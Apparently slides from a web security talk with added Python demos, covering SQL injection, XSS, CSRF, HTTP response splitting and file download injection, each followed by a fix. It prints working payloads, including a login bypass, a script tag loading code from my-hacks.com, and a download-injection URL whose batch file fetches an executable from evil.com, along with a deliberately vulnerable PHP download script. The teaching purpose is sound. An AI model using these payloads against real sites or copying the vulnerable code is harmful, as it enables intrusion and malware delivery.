Trendy Web Security

November 2019

A Review of times past

SQL Injection

Password field: ' OR 1=1; --

Parses as: SELECT username FROM users WHERE username = 'username' AND password = '' OR 1=1; --'

The first quote closes the empty password literal, AND binds tighter than OR so "OR 1=1" makes the WHERE clause true for every row, and the -- comments out the server's closing quote.

And you're in...
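The injection above, worked through in Python against an in-memory SQLite table. This is an added example, not code from the slides: the table, the two users and their plaintext passwords are constructed for the demo (a real schema would store password hashes). It shows the concatenated query the slide describes next to the parameterized version that treats the payload as plain data.

```python
import sqlite3

# The payload from the slide, typed into the password field.
PAYLOAD = "' OR 1=1; --"


def make_db():
    # Constructed in-memory users table for the demo; plaintext passwords only
    # to keep the focus on the query, never do this in real code.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "correct horse"), ("bob", "hunter2")])
    return conn


def build_vulnerable_sql(username, password):
    # String concatenation: the attacker's quote ends the literal and the rest
    # of the input is parsed as SQL.
    return ("SELECT username FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")


def login_vulnerable(conn, username, password):
    # Returns every username the query matched, i.e. who you are "logged in" as.
    # With PAYLOAD the WHERE clause is true for every row.
    return [row[0] for row in conn.execute(build_vulnerable_sql(username, password))]


def login_fixed(conn, username, password):
    # Bound parameters: the driver passes the values separately from the SQL,
    # so quotes, OR and -- are just characters inside the password string.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_sql("alice", PAYLOAD))
    print("vulnerable:", login_vulnerable(db, "alice", PAYLOAD))
    print("fixed:     ", login_fixed(db, "alice", PAYLOAD))
```

The vulnerable query returns both users (the attacker is logged in as the first row, alice); the parameterized one returns nothing, because no account has the literal password "' OR 1=1; --".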

Cross Site Scripting (XSS)

About-Me field: I enjoy long walks on the beach, and <script src="http://my-hacks.com/owned.js">

The field is stored and later rendered unescaped, so now you have your code running in another guy's browser.

Have your code change his Linksys' DNS settings?
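The fix for the stored XSS above is output encoding at render time. This is an added example, not code from the slides: the About-Me string is the slide's payload with a closing </script> tag added so it is well-formed, and the two render functions are hypothetical.

```python
import html

# Constructed profile text: the slide's payload, with the tag closed.
ABOUT_ME = ('I enjoy long walks on the beach, and '
            '<script src="http://my-hacks.com/owned.js"></script>')


def render_about_me_unsafe(about_me):
    # Raw interpolation: whatever the user stored is parsed as HTML by every
    # visitor's browser, so the script tag loads owned.js from my-hacks.com.
    return "<p>" + about_me + "</p>"


def render_about_me(about_me):
    # Output encoding for the HTML body context: <, >, &, " and ' become
    # entities, so the browser displays the text instead of executing it.
    return "<p>" + html.escape(about_me, quote=True) + "</p>"


if __name__ == "__main__":
    print(render_about_me_unsafe(ABOUT_ME))
    print(render_about_me(ABOUT_ME))
```

html.escape is correct for text between tags; a value placed inside a URL, a JavaScript string or a CSS property needs the encoding for that context instead.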

SQL Injections and XSS attacks are old news.

What's new(er)?

Clickjacking

A Demo...

No JS Needed!

Cross Site Request Forgery (CSRF)



You are now logged out of Google.

Or... had your domain stolen:

• CSRF creates a new Gmail filter which forwards certain emails (those from your domain registrar) to the attacker

• The attacker asks your registrar for a transfer + unlock; the confirmation email lands in your inbox and the filter forwards it to him

• The attacker transfers your domain away.
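What stops the forged "create a filter" request is a token the attacker's page cannot read, plus refusing to change state on GET. This is an added example, not Gmail's code or anything from the slides: the request dictionaries are constructed stand-ins for HTTP requests, "SID" is an assumed session cookie name, and the secret key is assumed to come from configuration in a real application.

```python
import hashlib
import hmac
import secrets

# Per-deployment secret; assumed to be loaded from configuration in real code.
SECRET_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id):
    # Bind the token to the victim's session. evil.com can make the victim's
    # browser send the session cookie, but it can never read this value, so a
    # forged form cannot include it.
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def create_filter(request):
    # The state-changing endpoint. `request` is a constructed stand-in for an
    # HTTP request: {"method": ..., "cookies": {...}, "form": {...}}.
    if request["method"] != "POST":
        # State changes only on POST: an <img src=...> can only ever GET.
        return "405 Method Not Allowed"
    session_id = request["cookies"].get("SID")  # "SID" is an assumed cookie name
    if session_id is None:
        return "401 Unauthorized"
    submitted = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(submitted, issue_csrf_token(session_id)):
        return "403 Forbidden: missing or wrong CSRF token"
    return "200 OK: filter forwarding to %s created" % request["form"]["forward_to"]


def legitimate_request(session_id):
    # The real settings page rendered the token into its own form.
    return {"method": "POST", "cookies": {"SID": session_id},
            "form": {"forward_to": "me@example.com",
                     "csrf_token": issue_csrf_token(session_id)}}


def forged_post(session_id):
    # Auto-submitted form on evil.com: the browser attaches the cookie,
    # the attacker has no token to attach.
    return {"method": "POST", "cookies": {"SID": session_id},
            "form": {"forward_to": "attacker@evil.com"}}


def forged_get(session_id):
    # <img src="https://mail.example/filters?forward_to=attacker@evil.com">
    return {"method": "GET", "cookies": {"SID": session_id},
            "form": {"forward_to": "attacker@evil.com"}}


if __name__ == "__main__":
    for req in (legitimate_request("s1"), forged_post("s1"), forged_get("s1")):
        print(create_filter(req))
```

compare_digest keeps the token check constant-time; a token copied from a different session is rejected too, because the HMAC is keyed on the session id.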

HTTP Response Splitting

Normal: /redir_lang.jsp?lang=English

Attack: /redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>

(%0d%0a is CR LF. The first one ends the Location header the server builds from lang, the empty line ends the 302 response, and everything after it is a second, attacker-written response.)

HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http://10.1.1.1/by_lang.jsp?lang=foobar
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<html>Shazam</html>
Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT 2003 271009 with
Content-Type: text/html
Set-Cookie: JSESSIONID=1pwxbgHwzeaIIFyaksxqsq92Z0VULcQUcAanfK7In7IyrCST9UsS!-1251019693; path=/
Connection: Close

302 Moved Temporarily
This document you requested has moved temporarily.
It's now at http://10.1.1.1/by_lang.jsp?lang=foobar Content-Length: 0 HTTP/1.1 200 OK Content-Type: text/html Content-Length: 19 <html>Shazam</html>.

A browser or proxy sees a 302 with an empty body, then a second, complete 200 response whose body is <html>Shazam</html>. The server's real headers and its own 302 page trail behind as junk.



Why?

• Cache poisoning (the proxy caches the attacker's 200 for the next request)
• Replace content
• Phishing
• XSS
• etc.

File Download Injection

A similar idea to response splitting.

We've all written download scripts: download.php?file=report.xls

    <?php
    // download.php?file=report.xls
    // basename() only strips the directory part; CR/LF in the value still
    // reaches the header line below.
    $filename = basename($_GET["file"]);
    header('Content-Disposition: attachment; filename="' . $filename . '"');
    readfile($filename);
    return;

http://[trusted_domain]/download.php?file=attack.bat%0d%0a%0d%0aecho%20get%20/pub/winzip/wzinet95.exe|ftp%20-A%20evil.com%0d%0awzinet95.exe

HTTP/1.1 200 OK
Date: Thu, 27 Mar 2008 05:02:24 GMT
Server: Apache
Path=/download
Content-Disposition: attachment;filename=attack.bat
Content-length: 88

echo get /pub/winzip/wzinet95.exe|ftp -A evil.com
wzinet95.exe
Content-Length: 0
Content-Type: application/octet-stream;charset=euc-kr

The injected empty line ends the headers right after filename=attack.bat, so the user downloads a batch file from the trusted domain whose contents are the attacker's commands (plus the server's leftover headers).
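Both attacks above (the redir_lang.jsp response splitting and the download.php file download injection) come down to one bug: a CR/LF from the request is copied into a response header. The example below is added here and is not code from the slides or from the referenced papers. It replays the two payloads shown above through a tiny response serializer, first verbatim, then with the check a practitioner wants: reject any header value containing CR or LF, and, for downloads, take the file name from a server-side allowlist instead of the HTTP argument (the mitigation the slides recommend later). The URLs are copied from the slides; the allowlist, the /srv/downloads path and the handler names are assumptions for the demo.

```python
import os
from urllib.parse import urlsplit, parse_qs


class HeaderInjection(ValueError):
    """Raised when a header value would end the line (and maybe the headers)."""


def build_response(status, headers, body=b""):
    # Naive serializer: header values are copied verbatim, which is exactly what
    # redir_lang.jsp and download.php do with attacker-controlled input.
    lines = ["HTTP/1.1 " + status] + [name + ": " + value for name, value in headers]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1") + body


def build_response_safe(status, headers, body=b""):
    # The fix: a header value may never contain CR or LF. Reject rather than
    # strip, so a mangled value cannot silently mean something else.
    for name, value in headers:
        if "\r" in value or "\n" in value:
            raise HeaderInjection("CR/LF in header %r: %r" % (name, value))
    return build_response(status, headers, body)


def count_messages(raw):
    # Crude: every status line that follows an empty line starts a new message,
    # which is how a proxy or browser would carve up the stream.
    return 1 + raw.count(b"\r\n\r\nHTTP/1.")


def query_param(url, name):
    # parse_qs percent-decodes, so %0d%0a is a real CR LF from here on.
    return parse_qs(urlsplit(url).query)[name][0]


# Constructed request URLs, copied from the two payloads on the slides.
SPLIT_URL = ("/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0a"
             "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
             "Content-Length:%2019%0d%0a%0d%0a%3Chtml%3EShazam%3C/html%3E")
DOWNLOAD_URL = ("/download.php?file=attack.bat%0d%0a%0d%0a"
                "echo%20get%20/pub/winzip/wzinet95.exe|ftp%20-A%20evil.com%0d%0awzinet95.exe")

# Constructed allowlist: the only files download.php may serve (hypothetical path).
FILES = {"report.xls": "/srv/downloads/report.xls"}


def redir_lang(url, safe=False):
    lang = query_param(url, "lang")
    headers = [("Location", "http://10.1.1.1/by_lang.jsp?lang=" + lang),
               ("Content-Length", "0")]
    if not safe:
        return build_response("302 Moved Temporarily", headers)
    try:
        return build_response_safe("302 Moved Temporarily", headers)
    except HeaderInjection:
        return build_response("400 Bad Request", [("Content-Length", "0")])


def download(url):
    # Vulnerable: the Content-Disposition file name comes straight from the URL.
    # basename() would not help; it strips directories, not line breaks.
    filename = query_param(url, "file")
    headers = [("Content-Disposition", 'attachment; filename="' + filename + '"'),
               ("Content-Type", "application/octet-stream")]
    return build_response("200 OK", headers, b"<real file bytes>")


def download_safe(url):
    # Mitigation: look the request up, then use the real server-side file name.
    requested = query_param(url, "file")
    if requested not in FILES:
        return build_response("404 Not Found", [("Content-Length", "0")])
    filename = os.path.basename(FILES[requested])
    headers = [("Content-Disposition", 'attachment; filename="' + filename + '"'),
               ("Content-Type", "application/octet-stream")]
    return build_response_safe("200 OK", headers, b"<real file bytes>")


if __name__ == "__main__":
    print(redir_lang(SPLIT_URL).decode("latin-1"))
    print("messages in stream:", count_messages(redir_lang(SPLIT_URL)))
    print(download(DOWNLOAD_URL).decode("latin-1"))
    print(download_safe(DOWNLOAD_URL).decode("latin-1"))
```

Run it and the vulnerable redirect serializes to two HTTP messages, the second one being the attacker's <html>Shazam</html>; the vulnerable download puts the echo/ftp lines before the server's own Content-Type header, i.e. into the downloaded file. Real servlet containers and PHP now refuse CR/LF in header() values for exactly this reason, but anything that writes raw sockets or builds headers by hand still needs the check.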

It's a dangerous world...

How about some Mitigation

As a user: keep sensitive stuff (mail, banking, your registrar) in a separate browser, so a page you browse casually has no logged-in session to ride on.

As a programmer: whitelist everything. Nothing gets through without you knowing.

As a programmer: GET vs. POST. Use them correctly. GET must never change state, so an <img> tag on someone else's page can't trigger it.

Download injection: use the real file name from the server side, not the HTTP argument (and reject any header value containing CR or LF).

Clickjacking: NoScript has a "Forbid iframe" feature. That only protects NoScript users; the server-side fix is the X-Frame-Options response header (or CSP frame-ancestors), which tells the browser not to render the page inside a frame.

Links

• http://it.slashdot.org/article.pl?sid=08/09/25/1955228&from=rss
• http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
• http://packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
• http://lists.grok.org.uk/pipermail/full-disclosure/2006-February/042358.html
• http://www.webappsec.org/lists/websecurity/archive/2008-04/msg00003.html
• http://www.aspectsecurity.com/documents/Aspect_File_Download_Injection.pdf
• http://www.breakingpointsystems.com/community/blog/clickjacking
• http://en.wikipedia.org/wiki/Cross-site_request_forgery
• http://www.davidairey.com/google-gmail-security-hijack/
• http://www.cyberciti.biz/tips/firefox-stop-clickjacking-attack.html
